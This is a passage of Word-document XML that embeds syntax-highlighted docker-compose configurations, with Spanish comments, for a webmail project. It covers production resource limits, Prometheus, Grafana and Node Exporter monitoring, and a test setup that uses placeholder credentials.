        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">prod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  # No levantar nginx en dev</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># docker-compose.prod.yml (producción)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>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512M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reservations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'0.25'</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128M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</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json-file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">options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max-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"10m"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">max-file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"5"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>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64M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</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json-file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">options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max-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"10m"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">max-file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"443:443"</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'0.25'</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128M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mongo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserv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'2.0'</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2G </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reservations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512M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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512M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">seaweedfs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserv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2G </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Prometheus para métricas</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prom/prometheus:v3.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">container_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6_prometheus</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./monitoring/prometheus.yml:/etc/prometheus/prometheus.yml:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prometheus_data:/prometheus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"9090:9090"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">command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'--config.file=/etc/prometheus/prometheus.yml'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'--storage.tsdb.path=/prometheus'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'--storage.tsdb.retention.time=15d'</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webmail6_net</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Grafana para visualización</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">grafana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grafana/grafana:11.4.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">container_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6_grafana</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grafana_data:/var/lib/grafana</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./monitoring/grafana-dashboards:/etc/grafana/provisioning/dashboards:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./monitoring/grafana-datasources.yml:/etc/grafana/provisioning/datasources/datasources.yml:ro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"3001:3000"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GF_SECURITY_ADMIN_PASSWORD__FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /run/secrets/grafana_admin_password</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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> grafana_admin_password</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webmail6_net</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Node Exporter para métricas del host</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">node-exporter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prom/node-exporter:v1.8.2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">container_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6_node_exporter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/proc:/host/proc:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /sys:/host/sys:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /:/rootfs:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">command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'--path.procfs=/host/proc'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'--path.rootfs=/rootfs'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'--path.sysfs=/host/sys'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'--collector.filesystem.mount-points-exclude=^/(sys|proc|dev|host|etc)($$|/)'</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webmail6_net</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prometheus_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">grafana_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">grafana_admin_password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> GRAFANA_ADMIN_PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># docker-compose.test.yml (E2E testing)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>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dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/api/Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> production</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NODE_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MONGODB_URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongodb://admin:testpass@mongo:27017/webmail6_test?authSource=admin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test-jwt-secret-32-bytes-long!!!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0000000000000000000000000000000000000000000000000000000000000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mongo</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MONGO_INITDB_ROOT_USERNAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MONGO_INITDB_ROOT_PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testpass</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  # MailSlurp mock server para E2E</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mailslurp-mock</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mailslurp/mailslurp:latest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webmail6_mailslurp</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"1080:1080"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2587:2587"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
